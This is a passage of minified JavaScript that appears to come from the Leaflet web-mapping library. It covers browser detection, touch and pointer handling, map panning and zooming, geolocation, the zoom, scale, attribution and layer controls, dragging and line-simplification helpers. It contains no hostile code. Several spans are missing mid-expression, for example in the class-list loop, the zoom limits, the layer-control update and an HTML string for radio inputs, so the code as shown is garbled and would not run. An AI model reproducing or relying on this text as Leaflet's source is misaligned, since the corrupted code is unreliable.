e.adj=="object"}catch{return!1}}(),ho=navigator.platform.indexOf("Mac")===0,uo=navigator.platform.indexOf("Linux")===0;function St(t){return navigator.userAgent.toLowerCase().indexOf(t)>=0}var T={ie:Te,ielt9:qn,edge:Ii,webkit:Ke,android:Ai,android23:Bi,androidStock:Kn,opera:Ye,chrome:Ni,gecko:Di,safari:Yn,phantom:Ri,opera12:Fi,win:Jn,ie3d:Hi,webkit3d:Je,gecko3d:Wi,any3d:Xn,mobile:ae,mobileWebkit:Qn,mobileWebkit3d:$n,msPointer:Ui,pointer:Vi,touch:to,touchNative:Gi,mobileOpera:eo,mobileGecko:io,retina:no,passiveEvents:oo,canvas:so,svg:Xe,vml:ao,inlineSvg:ro,mac:ho,linux:uo},qi=T.msPointer?"MSPointerDown":"pointerdown",ji=T.msPointer?"MSPointerMove":"pointermove",Ki=T.msPointer?"MSPointerUp":"pointerup",Yi=T.msPointer?"MSPointerCancel":"pointercancel",Qe={touchstart:qi,touchmove:ji,touchend:Ki,touchcancel:Yi},Ji={touchstart:po,touchmove:Me,touchend:Me,touchcancel:Me},Xt={},Xi=!1;function lo(t,e,i){return e==="touchstart"&&mo(),Ji[e]?(i=Ji[e].bind(this,i),t.addEventListener(Qe[e],i,!1),i):(console.warn("wrong event specified:",e),v)}function co(t,e,i){if(!Qe[e]){console.warn("wrong event specified:",e);return}t.removeEventListener(Qe[e],i,!1)}function fo(t){Xt[t.pointerId]=t}function _o(t){Xt[t.pointerId]&&(Xt[t.pointerId]=t)}function Qi(t){delete Xt[t.pointerId]}function mo(){Xi||(document.addEventListener(qi,fo,!0),document.addEventListener(ji,_o,!0),document.addEventListener(Ki,Qi,!0),document.addEventListener(Yi,Qi,!0),Xi=!0)}function Me(t,e){if(e.pointerType!==(e.MSPOINTER_TYPE_MOUSE||"mouse")){e.touches=[];for(var i in Xt)e.touches.push(Xt[i]);e.changedTouches=[e],t(e)}}function po(t,e){e.MSPOINTER_TYPE_TOUCH&&e.pointerType===e.MSPOINTER_TYPE_TOUCH&&ut(e),Me(t,e)}function vo(t){var e={},i,n;for(n in t)i=t[n],e[n]=i&&i.bind?i.bind(t):i;return t=e,e.type="dblclick",e.detail=2,e.isTrusted=!1,e._simulated=!0,e}var go=200;function yo(t,e){t.addEventListener("dblclick",e);var i=0,n;function o(s){if(s.detail!==1){n=s.detail;return}if(!(s.pointerType==="mouse"||s.sourceCapabilities&&!s.sourceCapabilities.firesTouchEvents)){var r=on(s);if(!(r.some(function(u){return u instanceof HTMLLabelElement&&u.attributes.for})&&!r.some(function(u){return u instanceof HTMLInputElement||u instanceof HTMLSelectElement}))){var a=Date.now();a-i<=go?(n++,n===2&&e(vo(s))):n=1,i=a}}}return t.addEventListener("click",o),{dblclick:e,simDblclick:o}}function wo(t,e){t.removeEventListener("dblclick",e.dblclick),t.removeEventListener("click",e.simDblclick)}var $e=ke(["transform","webkitTransform","OTransform","MozTransform","msTransform"]),he=ke(["webkitTransition","transition","OTransition","MozTransition","msTransition"]),$i=he==="webkitTransition"||he==="OTransition"?he+"End":"transitionend";function tn(t){return typeof t=="string"?document.getElementById(t):t}function ue(t,e){var i=t.style[e]||t.currentStyle&&t.currentStyle[e];if((!i||i==="auto")&&document.defaultView){var n=document.defaultView.getComputedStyle(t,null);i=n?n[e]:null}return i==="auto"?null:i}function U(t,e,i){var n=document.createElement(t);return n.className=e||"",i&&i.appendChild(n),n}function $(t){var e=t.parentNode;e&&e.removeChild(t)}function Ce(t){for(;t.firstChild;)t.removeChild(t.firstChild)}function Qt(t){var e=t.parentNode;e&&e.lastChild!==t&&e.appendChild(t)}function $t(t){var e=t.parentNode;e&&e.firstChild!==t&&e.insertBefore(t,e.firstChild)}function ti(t,e){if(t.classList!==void 0)return t.classList.contains(e);var i=Se(t);return i.length>0&&new RegExp("(^|\\s)"+e+"(\\s|$)").test(i)}function A(t,e){if(t.classList!==void 0)for(var i=x(e),n=0,o=i.length;n0?2*window.devicePixelRatio:1;function rn(t){return T.edge?t.wheelDeltaY/2:t.deltaY&&t.deltaMode===0?-t.deltaY/Lo:t.deltaY&&t.deltaMode===1?-t.deltaY*20:t.deltaY&&t.deltaMode===2?-t.deltaY*60:t.deltaX||t.deltaZ?0:t.wheelDelta?(t.wheelDeltaY||t.wheelDelta)/2:t.detail&&Math.abs(t.detail)<32765?-t.detail*20:t.detail?t.detail/-32765*60:0}function fi(t,e){var i=e.relatedTarget;if(!i)return!0;try{for(;i&&i!==t;)i=i.parentNode}catch{return!1}return i!==t}var bo={__proto__:null,on:I,off:K,stopPropagation:jt,disableScrollPropagation:ci,disableClickPropagation:de,preventDefault:ut,stop:Kt,getPropagationPath:on,getMousePosition:sn,getWheelDelta:rn,isExternalTarget:fi,addListener:I,removeListener:K},an=Ht.extend({run:function(t,e,i,n){this.stop(),this._el=t,this._inProgress=!0,this._duration=i||.25,this._easeOutPower=1/Math.max(n||.5,.2),this._startPos=qt(t),this._offset=e.subtract(this._startPos),this._startTime=+new Date,this.fire("start"),this._animate()},stop:function(){this._inProgress&&(this._step(!0),this._complete())},_animate:function(){this._animId=X(this._animate,this),this._step()},_step:function(t){var e=+new Date-this._startTime,i=this._duration*1e3;ethis.options.maxZoom)?this.setZoom(t):this},panInsideBounds:function(t,e){this._enforcingBounds=!0;var i=this.getCenter(),n=this._limitCenter(i,this._zoom,it(t));return i.equals(n)||this.panTo(n,e),this._enforcingBounds=!1,this},panInside:function(t,e){e=e||{};var i=Z(e.paddingTopLeft||e.padding||[0,0]),n=Z(e.paddingBottomRight||e.padding||[0,0]),o=this.project(this.getCenter()),s=this.project(t),r=this.getPixelBounds(),a=pt([r.min.add(i),r.max.subtract(n)]),u=a.getSize();if(!a.contains(s)){this._enforcingBounds=!0;var c=s.subtract(a.getCenter()),y=a.extend(s).getSize().subtract(u);o.x+=c.x<0?-y.x:y.x,o.y+=c.y<0?-y.y:y.y,this.panTo(this.unproject(o),e),this._enforcingBounds=!1}return this},invalidateSize:function(t){if(!this._loaded)return this;t=l({animate:!1,pan:!0},t===!0?{animate:!0}:t);var e=this.getSize();this._sizeChanged=!0,this._lastCenter=null;var i=this.getSize(),n=e.divideBy(2).round(),o=i.divideBy(2).round(),s=n.subtract(o);return!s.x&&!s.y?this:(t.animate&&t.pan?this.panBy(s):(t.pan&&this._rawPanBy(s),this.fire("move"),t.debounceMoveend?(clearTimeout(this._sizeTimer),this._sizeTimer=setTimeout(_(this.fire,this,"moveend"),200)):this.fire("moveend")),this.fire("resize",{oldSize:e,newSize:i}))},stop:function(){return this.setZoom(this._limitZoom(this._zoom)),this.options.zoomSnap||this.fire("viewreset"),this._stop()},locate:function(t){if(t=this._locateOptions=l({timeout:1e4,watch:!1},t),!("geolocation"in navigator))return this._handleGeolocationError({code:0,message:"Geolocation not supported."}),this;var e=_(this._handleGeolocationResponse,this),i=_(this._handleGeolocationError,this);return t.watch?this._locationWatchId=navigator.geolocation.watchPosition(e,i,t):navigator.geolocation.getCurrentPosition(e,i,t),this},stopLocate:function(){return navigator.geolocation&&navigator.geolocation.clearWatch&&navigator.geolocation.clearWatch(this._locationWatchId),this._locateOptions&&(this._locateOptions.setView=!1),this},_handleGeolocationError:function(t){if(this._container._leaflet_id){var e=t.code,i=t.message||(e===1?"permission denied":e===2?"position unavailable":"timeout");this._locateOptions.setView&&!this._loaded&&this.fitWorld(),this.fire("locationerror",{code:e,message:"Geolocation error: "+i+"."})}},_handleGeolocationResponse:function(t){if(this._container._leaflet_id){var e=t.coords.latitude,i=t.coords.longitude,n=new j(e,i),o=n.toBounds(t.coords.accuracy*2),s=this._locateOptions;if(s.setView){var r=this.getBoundsZoom(o);this.setView(n,s.maxZoom?Math.min(r,s.maxZoom):r)}var a={latlng:n,bounds:o,timestamp:t.timestamp};for(var u in t.coords)typeof t.coords[u]=="number"&&(a[u]=t.coords[u]);this.fire("locationfound",a)}},addHandler:function(t,e){if(!e)return this;var i=this[t]=new e(this);return this._handlers.push(i),this.options[t]&&i.enable(),this},remove:function(){if(this._initEvents(!0),this.options.maxBounds&&this.off("moveend",this._panInsideMaxBounds),this._containerId!==this._container._leaflet_id)throw new Error("Map container is being reused by another instance");try{delete this._container._leaflet_id,delete this._containerId}catch{this._container._leaflet_id=void 0,this._containerId=void 0}this._locationWatchId!==void 0&&this.stopLocate(),this._stop(),$(this._mapPane),this._clearControlPos&&this._clearControlPos(),this._resizeRequest&&(dt(this._resizeRequest),this._resizeRequest=null),this._clearHandlers(),this._loaded&&this.fire("unload");var t;for(t in this._layers)this._layers[t].remove();for(t in this._panes)$(this._panes[t]);return this._layers=[],this._panes=[],delete this._mapPane,delete this._renderer,this},createPane:function(t,e){var i="leaflet-pane"+(t?" leaflet-"+t.replace("Pane","")+"-pane":""),n=U("div",i,e||this._mapPane);return t&&(this._panes[t]=n),n},getCenter:function(){return this._checkIfLoaded(),this._lastCenter&&!this._moved()?this._lastCenter.clone():this.layerPointToLatLng(this._getCenterLayerPoint())},getZoom:function(){return this._zoom},getBounds:function(){var t=this.getPixelBounds(),e=this.unproject(t.getBottomLeft()),i=this.unproject(t.getTopRight());return new vt(e,i)},getMinZoom:function(){return this.options.minZoom===void 0?this._layersMinZoom||0:this.options.minZoom},getMaxZoom:function(){return this.options.maxZoom===void 0?this._layersMaxZoom===void 0?1/0:this._layersMaxZoom:this.options.maxZoom},getBoundsZoom:function(t,e,i){t=it(t),i=Z(i||[0,0]);var n=this.getZoom()||0,o=this.getMinZoom(),s=this.getMaxZoom(),r=t.getNorthWest(),a=t.getSouthEast(),u=this.getSize().subtract(i),c=pt(this.project(a,n),this.project(r,n)).getSize(),y=T.any3d?this.options.zoomSnap:1,C=u.x/c.x,N=u.y/c.y,_t=e?Math.max(C,N):Math.min(C,N);return n=this.getScaleZoom(_t,n),y&&(n=Math.round(n/(y/100))*(y/100),n=e?Math.ceil(n/y)*y:Math.floor(n/y)*y),Math.max(o,Math.min(s,n))},getSize:function(){return(!this._size||this._sizeChanged)&&(this._size=new E(this._container.clientWidth||0,this._container.clientHeight||0),this._sizeChanged=!1),this._size.clone()},getPixelBounds:function(t,e){var i=this._getTopLeftPoint(t,e);return new Q(i,i.add(this.getSize()))},getPixelOrigin:function(){return this._checkIfLoaded(),this._pixelOrigin},getPixelWorldBounds:function(t){return this.options.crs.getProjectedBounds(t===void 0?this.getZoom():t)},getPane:function(t){return typeof t=="string"?this._panes[t]:t},getPanes:function(){return this._panes},getContainer:function(){return this._container},getZoomScale:function(t,e){var i=this.options.crs;return e=e===void 0?this._zoom:e,i.scale(t)/i.scale(e)},getScaleZoom:function(t,e){var i=this.options.crs;e=e===void 0?this._zoom:e;var n=i.zoom(t*i.scale(e));return isNaN(n)?1/0:n},project:function(t,e){return e=e===void 0?this._zoom:e,this.options.crs.latLngToPoint(F(t),e)},unproject:function(t,e){return e=e===void 0?this._zoom:e,this.options.crs.pointToLatLng(Z(t),e)},layerPointToLatLng:function(t){var e=Z(t).add(this.getPixelOrigin());return this.unproject(e)},latLngToLayerPoint:function(t){var e=this.project(F(t))._round();return e._subtract(this.getPixelOrigin())},wrapLatLng:function(t){return this.options.crs.wrapLatLng(F(t))},wrapLatLngBounds:function(t){return this.options.crs.wrapLatLngBounds(it(t))},distance:function(t,e){return this.options.crs.distance(F(t),F(e))},containerPointToLayerPoint:function(t){return Z(t).subtract(this._getMapPanePos())},layerPointToContainerPoint:function(t){return Z(t).add(this._getMapPanePos())},containerPointToLatLng:function(t){var e=this.containerPointToLayerPoint(Z(t));return this.layerPointToLatLng(e)},latLngToContainerPoint:function(t){return this.layerPointToContainerPoint(this.latLngToLayerPoint(F(t)))},mouseEventToContainerPoint:function(t){return sn(t,this._container)},mouseEventToLayerPoint:function(t){return this.containerPointToLayerPoint(this.mouseEventToContainerPoint(t))},mouseEventToLatLng:function(t){return this.layerPointToLatLng(this.mouseEventToLayerPoint(t))},_initContainer:function(t){var e=this._container=tn(t);if(e){if(e._leaflet_id)throw new Error("Map container is already initialized.")}else throw new Error("Map container not found.");I(e,"scroll",this._onScroll,this),this._containerId=g(e)},_initLayout:function(){var t=this._container;this._fadeAnimated=this.options.fadeAnimation&&T.any3d,A(t,"leaflet-container"+(T.touch?" leaflet-touch":"")+(T.retina?" leaflet-retina":"")+(T.ielt9?" leaflet-oldie":"")+(T.safari?" leaflet-safari":"")+(this._fadeAnimated?" leaflet-fade-anim":""));var e=ue(t,"position");e!=="absolute"&&e!=="relative"&&e!=="fixed"&&e!=="sticky"&&(t.style.position="relative"),this._initPanes(),this._initControlPos&&this._initControlPos()},_initPanes:function(){var t=this._panes={};this._paneRenderers={},this._mapPane=this.createPane("mapPane",this._container),nt(this._mapPane,new E(0,0)),this.createPane("tilePane"),this.createPane("overlayPane"),this.createPane("shadowPane"),this.createPane("markerPane"),this.createPane("tooltipPane"),this.createPane("popupPane"),this.options.markerZoomAnimation||(A(t.markerPane,"leaflet-zoom-hide"),A(t.shadowPane,"leaflet-zoom-hide"))},_resetView:function(t,e,i){nt(this._mapPane,new E(0,0));var n=!this._loaded;this._loaded=!0,e=this._limitZoom(e),this.fire("viewprereset");var o=this._zoom!==e;this._moveStart(o,i)._move(t,e)._moveEnd(o),this.fire("viewreset"),n&&this.fire("load")},_moveStart:function(t,e){return t&&this.fire("zoomstart"),e||this.fire("movestart"),this},_move:function(t,e,i,n){e===void 0&&(e=this._zoom);var o=this._zoom!==e;return this._zoom=e,this._lastCenter=t,this._pixelOrigin=this._getNewPixelOrigin(t),n?i&&i.pinch&&this.fire("zoom",i):((o||i&&i.pinch)&&this.fire("zoom",i),this.fire("move",i)),this},_moveEnd:function(t){return t&&this.fire("zoomend"),this.fire("moveend")},_stop:function(){return dt(this._flyToFrame),this._panAnim&&this._panAnim.stop(),this},_rawPanBy:function(t){nt(this._mapPane,this._getMapPanePos().subtract(t))},_getZoomSpan:function(){return this.getMaxZoom()-this.getMinZoom()},_panInsideMaxBounds:function(){this._enforcingBounds||this.panInsideBounds(this.options.maxBounds)},_checkIfLoaded:function(){if(!this._loaded)throw new Error("Set map center and zoom first.")},_initEvents:function(t){this._targets={},this._targets[g(this._container)]=this;var e=t?K:I;e(this._container,"click dblclick mousedown mouseup mouseover mouseout mousemove contextmenu keypress keydown keyup",this._handleDOMEvent,this),this.options.trackResize&&e(window,"resize",this._onResize,this),T.any3d&&this.options.transform3DLimit&&(t?this.off:this.on).call(this,"moveend",this._onMoveEnd)},_onResize:function(){dt(this._resizeRequest),this._resizeRequest=X(function(){this.invalidateSize({debounceMoveend:!0})},this)},_onScroll:function(){this._container.scrollTop=0,this._container.scrollLeft=0},_onMoveEnd:function(){var t=this._getMapPanePos();Math.max(Math.abs(t.x),Math.abs(t.y))>=this.options.transform3DLimit&&this._resetView(this.getCenter(),this.getZoom())},_findEventTargets:function(t,e){for(var i=[],n,o=e==="mouseout"||e==="mouseover",s=t.target||t.srcElement,r=!1;s;){if(n=this._targets[g(s)],n&&(e==="click"||e==="preclick")&&this._draggableMoved(n)){r=!0;break}if(n&&n.listens(e,!0)&&(o&&!fi(s,t)||(i.push(n),o))||s===this._container)break;s=s.parentNode}return!i.length&&!r&&!o&&this.listens(e,!0)&&(i=[this]),i},_isClickDisabled:function(t){for(;t&&t!==this._container;){if(t._leaflet_disable_click)return!0;t=t.parentNode}},_handleDOMEvent:function(t){var e=t.target||t.srcElement;if(!(!this._loaded||e._leaflet_disable_events||t.type==="click"&&this._isClickDisabled(e))){var i=t.type;i==="mousedown"&&ri(e),this._fireDOMEvent(t,i)}},_mouseEvents:["click","dblclick","mouseover","mouseout","contextmenu"],_fireDOMEvent:function(t,e,i){if(t.type==="click"){var n=l({},t);n.type="preclick",this._fireDOMEvent(n,n.type,i)}var o=this._findEventTargets(t,e);if(i){for(var s=[],r=0;r0?Math.round(t-e)/2:Math.max(0,Math.ceil(t))-Math.max(0,Math.floor(e))},_limitZoom:function(t){var e=this.getMinZoom(),i=this.getMaxZoom(),n=T.any3d?this.options.zoomSnap:1;return n&&(t=Math.round(t/n)*n),Math.max(e,Math.min(i,t))},_onPanTransitionStep:function(){this.fire("move")},_onPanTransitionEnd:function(){tt(this._mapPane,"leaflet-pan-anim"),this.fire("moveend")},_tryAnimatedPan:function(t,e){var i=this._getCenterOffset(t)._trunc();return(e&&e.animate)!==!0&&!this.getSize().contains(i)?!1:(this.panBy(i,e),!0)},_createAnimProxy:function(){var t=this._proxy=U("div","leaflet-proxy leaflet-zoom-animated");this._panes.mapPane.appendChild(t),this.on("zoomanim",function(e){var i=$e,n=this._proxy.style[i];Gt(this._proxy,this.project(e.center,e.zoom),this.getZoomScale(e.zoom,1)),n===this._proxy.style[i]&&this._animatingZoom&&this._onZoomTransitionEnd()},this),this.on("load moveend",this._animMoveEnd,this),this._on("unload",this._destroyAnimProxy,this)},_destroyAnimProxy:function(){$(this._proxy),this.off("load moveend",this._animMoveEnd,this),delete this._proxy},_animMoveEnd:function(){var t=this.getCenter(),e=this.getZoom();Gt(this._proxy,this.project(t,e),this.getZoomScale(e,1))},_catchTransitionEnd:function(t){this._animatingZoom&&t.propertyName.indexOf("transform")>=0&&this._onZoomTransitionEnd()},_nothingToAnimate:function(){return!this._container.getElementsByClassName("leaflet-zoom-animated").length},_tryAnimatedZoom:function(t,e,i){if(this._animatingZoom)return!0;if(i=i||{},!this._zoomAnimated||i.animate===!1||this._nothingToAnimate()||Math.abs(e-this._zoom)>this.options.zoomAnimationThreshold)return!1;var n=this.getZoomScale(e),o=this._getCenterOffset(t)._divideBy(1-1/n);return i.animate!==!0&&!this.getSize().contains(o)?!1:(X(function(){this._moveStart(!0,i.noMoveStart||!1)._animateZoom(t,e,!0)},this),!0)},_animateZoom:function(t,e,i,n){this._mapPane&&(i&&(this._animatingZoom=!0,this._animateToCenter=t,this._animateToZoom=e,A(this._mapPane,"leaflet-zoom-anim")),this.fire("zoomanim",{center:t,zoom:e,noUpdate:n}),this._tempFireZoomEvent||(this._tempFireZoomEvent=this._zoom!==this._animateToZoom),this._move(this._animateToCenter,this._animateToZoom,void 0,!0),setTimeout(_(this._onZoomTransitionEnd,this),250))},_onZoomTransitionEnd:function(){this._animatingZoom&&(this._mapPane&&tt(this._mapPane,"leaflet-zoom-anim"),this._animatingZoom=!1,this._move(this._animateToCenter,this._animateToZoom,void 0,!0),this._tempFireZoomEvent&&this.fire("zoom"),delete this._tempFireZoomEvent,this.fire("move"),this._moveEnd(!0))}});function To(t,e){return new H(t,e)}var Mt=lt.extend({options:{position:"topright"},initialize:function(t){k(this,t)},getPosition:function(){return this.options.position},setPosition:function(t){var e=this._map;return e&&e.removeControl(this),this.options.position=t,e&&e.addControl(this),this},getContainer:function(){return this._container},addTo:function(t){this.remove(),this._map=t;var e=this._container=this.onAdd(t),i=this.getPosition(),n=t._controlCorners[i];return A(e,"leaflet-control"),i.indexOf("bottom")!==-1?n.insertBefore(e,n.firstChild):n.appendChild(e),this._map.on("unload",this.remove,this),this},remove:function(){return this._map?($(this._container),this.onRemove&&this.onRemove(this._map),this._map.off("unload",this.remove,this),this._map=null,this):this},_refocusOnMap:function(t){this._map&&t&&t.screenX>0&&t.screenY>0&&this._map.getContainer().focus()}}),_e=function(t){return new Mt(t)};H.include({addControl:function(t){return t.addTo(this),this},removeControl:function(t){return t.remove(),this},_initControlPos:function(){var t=this._controlCorners={},e="leaflet-",i=this._controlContainer=U("div",e+"control-container",this._container);function n(o,s){var r=e+o+" "+e+s;t[o+s]=U("div",r,i)}n("top","left"),n("top","right"),n("bottom","left"),n("bottom","right")},_clearControlPos:function(){for(var t in this._controlCorners)$(this._controlCorners[t]);$(this._controlContainer),delete this._controlCorners,delete this._controlContainer}});var hn=Mt.extend({options:{collapsed:!0,position:"topright",autoZIndex:!0,hideSingleBase:!1,sortLayers:!1,sortFunction:function(t,e,i,n){return i1,this._baseLayersList.style.display=t?"":"none"),this._separator.style.display=e&&t?"":"none",this},_onLayerChange:function(t){this._handlingClick||this._update();var e=this._getLayer(g(t.target)),i=e.overlay?t.type==="add"?"overlayadd":"overlayremove":t.type==="add"?"baselayerchange":null;i&&this._map.fire(i,e)},_createRadioElement:function(t,e){var i=' ",n=document.createElement("div");return n.innerHTML=i,n.firstChild},_addItem:function(t){var e=document.createElement("label"),i=this._map.hasLayer(t.layer),n;t.overlay?(n=document.createElement("input"),n.type="checkbox",n.className="leaflet-control-layers-selector",n.defaultChecked=i):n=this._createRadioElement("leaflet-base-layers_"+g(this),i),this._layerControlInputs.push(n),n.layerId=g(t.layer),I(n,"click",this._onInputClick,this);var o=document.createElement("span");o.innerHTML=" "+t.name;var s=document.createElement("span");e.appendChild(s),s.appendChild(n),s.appendChild(o);var r=t.overlay?this._overlaysList:this._baseLayersList;return r.appendChild(e),this._checkDisabledLayers(),e},_onInputClick:function(){if(!this._preventClick){var t=this._layerControlInputs,e,i,n=[],o=[];this._handlingClick=!0;for(var s=t.length-1;s>=0;s--)e=t[s],i=this._getLayer(e.layerId).layer,e.checked?n.push(i):e.checked||o.push(i);for(s=0;s=0;o--)e=t[o],i=this._getLayer(e.layerId).layer,e.disabled=i.options.minZoom!==void 0&&ni.options.maxZoom},_expandIfNotCollapsed:function(){return this._map&&!this.options.collapsed&&this.expand(),this},_expandSafely:function(){var t=this._section;this._preventClick=!0,I(t,"click",ut),this.expand();var e=this;setTimeout(function(){K(t,"click",ut),e._preventClick=!1})}}),Mo=function(t,e,i){return new hn(t,e,i)},di=Mt.extend({options:{position:"topleft",zoomInText:'+ ',zoomInTitle:"Zoom in",zoomOutText:'− ',zoomOutTitle:"Zoom out"},onAdd:function(t){var e="leaflet-control-zoom",i=U("div",e+" leaflet-bar"),n=this.options;return this._zoomInButton=this._createButton(n.zoomInText,n.zoomInTitle,e+"-in",i,this._zoomIn),this._zoomOutButton=this._createButton(n.zoomOutText,n.zoomOutTitle,e+"-out",i,this._zoomOut),this._updateDisabled(),t.on("zoomend zoomlevelschange",this._updateDisabled,this),i},onRemove:function(t){t.off("zoomend zoomlevelschange",this._updateDisabled,this)},disable:function(){return this._disabled=!0,this._updateDisabled(),this},enable:function(){return this._disabled=!1,this._updateDisabled(),this},_zoomIn:function(t){!this._disabled&&this._map._zoomthis._map.getMinZoom()&&this._map.zoomOut(this._map.options.zoomDelta*(t.shiftKey?3:1))},_createButton:function(t,e,i,n,o){var s=U("a",i,n);return s.innerHTML=t,s.href="#",s.title=e,s.setAttribute("role","button"),s.setAttribute("aria-label",e),de(s),I(s,"click",Kt),I(s,"click",o,this),I(s,"click",this._refocusOnMap,this),s},_updateDisabled:function(){var t=this._map,e="leaflet-disabled";tt(this._zoomInButton,e),tt(this._zoomOutButton,e),this._zoomInButton.setAttribute("aria-disabled","false"),this._zoomOutButton.setAttribute("aria-disabled","false"),(this._disabled||t._zoom===t.getMinZoom())&&(A(this._zoomOutButton,e),this._zoomOutButton.setAttribute("aria-disabled","true")),(this._disabled||t._zoom===t.getMaxZoom())&&(A(this._zoomInButton,e),this._zoomInButton.setAttribute("aria-disabled","true"))}});H.mergeOptions({zoomControl:!0}),H.addInitHook(function(){this.options.zoomControl&&(this.zoomControl=new di,this.addControl(this.zoomControl))});var Co=function(t){return new di(t)},un=Mt.extend({options:{position:"bottomleft",maxWidth:100,metric:!0,imperial:!0},onAdd:function(t){var e="leaflet-control-scale",i=U("div",e),n=this.options;return this._addScales(n,e+"-line",i),t.on(n.updateWhenIdle?"moveend":"move",this._update,this),t.whenReady(this._update,this),i},onRemove:function(t){t.off(this.options.updateWhenIdle?"moveend":"move",this._update,this)},_addScales:function(t,e,i){t.metric&&(this._mScale=U("div",e,i)),t.imperial&&(this._iScale=U("div",e,i))},_update:function(){var t=this._map,e=t.getSize().y/2,i=t.distance(t.containerPointToLatLng([0,e]),t.containerPointToLatLng([this.options.maxWidth,e]));this._updateScales(i)},_updateScales:function(t){this.options.metric&&t&&this._updateMetric(t),this.options.imperial&&t&&this._updateImperial(t)},_updateMetric:function(t){var e=this._getRoundNum(t),i=e<1e3?e+" m":e/1e3+" km";this._updateScale(this._mScale,i,e/t)},_updateImperial:function(t){var e=t*3.2808399,i,n,o;e>5280?(i=e/5280,n=this._getRoundNum(i),this._updateScale(this._iScale,n+" mi",n/i)):(o=this._getRoundNum(e),this._updateScale(this._iScale,o+" ft",o/e))},_updateScale:function(t,e,i){t.style.width=Math.round(this.options.maxWidth*i)+"px",t.innerHTML=e},_getRoundNum:function(t){var e=Math.pow(10,(Math.floor(t)+"").length-1),i=t/e;return i=i>=10?10:i>=5?5:i>=3?3:i>=2?2:1,e*i}}),So=function(t){return new un(t)},ko=' ',_i=Mt.extend({options:{position:"bottomright",prefix:''+(T.inlineSvg?ko+" ":"")+"Leaflet "},initialize:function(t){k(this,t),this._attributions={}},onAdd:function(t){t.attributionControl=this,this._container=U("div","leaflet-control-attribution"),de(this._container);for(var e in t._layers)t._layers[e].getAttribution&&this.addAttribution(t._layers[e].getAttribution());return this._update(),t.on("layeradd",this._addAttribution,this),this._container},onRemove:function(t){t.off("layeradd",this._addAttribution,this)},_addAttribution:function(t){t.layer.getAttribution&&(this.addAttribution(t.layer.getAttribution()),t.layer.once("remove",function(){this.removeAttribution(t.layer.getAttribution())},this))},setPrefix:function(t){return this.options.prefix=t,this._update(),this},addAttribution:function(t){return t?(this._attributions[t]||(this._attributions[t]=0),this._attributions[t]++,this._update(),this):this},removeAttribution:function(t){return t?(this._attributions[t]&&(this._attributions[t]--,this._update()),this):this},_update:function(){if(this._map){var t=[];for(var e in this._attributions)this._attributions[e]&&t.push(e);var i=[];this.options.prefix&&i.push(this.options.prefix),t.length&&i.push(t.join(", ")),this._container.innerHTML=i.join(' | ')}}});H.mergeOptions({attributionControl:!0}),H.addInitHook(function(){this.options.attributionControl&&new _i().addTo(this)});var Eo=function(t){return new _i(t)};Mt.Layers=hn,Mt.Zoom=di,Mt.Scale=un,Mt.Attribution=_i,_e.layers=Mo,_e.zoom=Co,_e.scale=So,_e.attribution=Eo;var Et=lt.extend({initialize:function(t){this._map=t},enable:function(){return this._enabled?this:(this._enabled=!0,this.addHooks(),this)},disable:function(){return this._enabled?(this._enabled=!1,this.removeHooks(),this):this},enabled:function(){return!!this._enabled}});Et.addTo=function(t,e){return t.addHandler(e,this),this};var zo={Events:et},ln=T.touch?"touchstart mousedown":"mousedown",Ut=Ht.extend({options:{clickTolerance:3},initialize:function(t,e,i,n){k(this,n),this._element=t,this._dragStartTarget=e||t,this._preventOutline=i},enable:function(){this._enabled||(I(this._dragStartTarget,ln,this._onDown,this),this._enabled=!0)},disable:function(){this._enabled&&(Ut._dragging===this&&this.finishDrag(!0),K(this._dragStartTarget,ln,this._onDown,this),this._enabled=!1,this._moved=!1)},_onDown:function(t){if(this._enabled&&(this._moved=!1,!ti(this._element,"leaflet-zoom-anim"))){if(t.touches&&t.touches.length!==1){Ut._dragging===this&&this.finishDrag();return}if(!(Ut._dragging||t.shiftKey||t.which!==1&&t.button!==1&&!t.touches)&&(Ut._dragging=this,this._preventOutline&&ri(this._element),ni(),le(),!this._moving)){this.fire("down");var e=t.touches?t.touches[0]:t,i=en(this._element);this._startPoint=new E(e.clientX,e.clientY),this._startPos=qt(this._element),this._parentScale=ai(i);var n=t.type==="mousedown";I(document,n?"mousemove":"touchmove",this._onMove,this),I(document,n?"mouseup":"touchend touchcancel",this._onUp,this)}}},_onMove:function(t){if(this._enabled){if(t.touches&&t.touches.length>1){this._moved=!0;return}var e=t.touches&&t.touches.length===1?t.touches[0]:t,i=new E(e.clientX,e.clientY)._subtract(this._startPoint);!i.x&&!i.y||Math.abs(i.x)+Math.abs(i.y)s&&(r=a,s=u);s>i&&(e[r]=1,pi(t,e,i,n,r),pi(t,e,i,r,o))}function Ao(t,e){for(var i=[t[0]],n=1,o=0,s=t.length;ne&&(i.push(t[n]),o=n);return oe.max.x&&(i|=2),t.ye.max.y&&(i|=8),i}function Bo(t,e){var i=e.x-t.x,n=e.y-t.y;return i*i+n*n}function me(t,e,i,n){var o=e.x,s=e.y,r=i.x-o,a=i.y-s,u=r*r+a*a,c;return u>0&&(c=((t.x-o)*r+(t.y-s)*a)/u,c>1?(o=i.x,s=i.y):c>0&&(o+=r*c,s+=a*c)),r=t.x-o,a=t.y-s,n?r*r+a*a:new E(o,s)}function xt(t){return!q(t[0])||typeof t[0][0]!="object"&&typeof t[0][0]<"u"}function vn(t){return console.warn("Deprecated use of _flat, please use L.LineUtil.isFlat instead."),xt(t)}function gn(t,e){var i,n,o,s,r,a,u,c;if(!t||t.length===0)throw new Error("latlngs not passed");xt(t)||(console.warn("latlngs are not flat! Only the first ring will be used"),t=t[0]);var y=F([0,0]),C=it(t),N=C.getNorthWest().distanceTo(C.getSouthWest())*C.getNorthEast().distanceTo(C.getNorthWest());N<1700&&(y=mi(t));var _t=t.length,at=[];for(i=0;i<_t;i++){var Lt=F(t[i]);at.push(e.project(F([Lt.lat-y.lat,Lt.lng-y.lng])))}for(i=0,n=0;i<_t-1;i++)n+=at[i].distanceTo(at[i+1])/2;if(n===0)c=at[0];else for(i=0,s=0;i<_t-1;i++)if(r=at[i],a=at[i+1],o=r.distanceTo(a),s+=o,s>n){u=(s-n)/o,c=[a.x-u*(a.x-r.x),a.y-u*(a.y-r.y)];break}var gt=e.unproject(Z(c));return F([gt.lat+y.lat,gt.lng+y.lng])}var No={__proto__:null,simplify:dn,pointToSegmentDistance:_n,closestPointOnSegment:Zo,clipSegment:pn,_getEdgeIntersection:Oe,_getBitCode:Yt,_sqClosestPointOnSegment:me,isFlat:xt,_flat:vn,polylineCenter:gn},vi={project:function(t){return new E(t.lng,t.lat)},unproject:function(t){return new j(t.y,t.x)},bounds:new 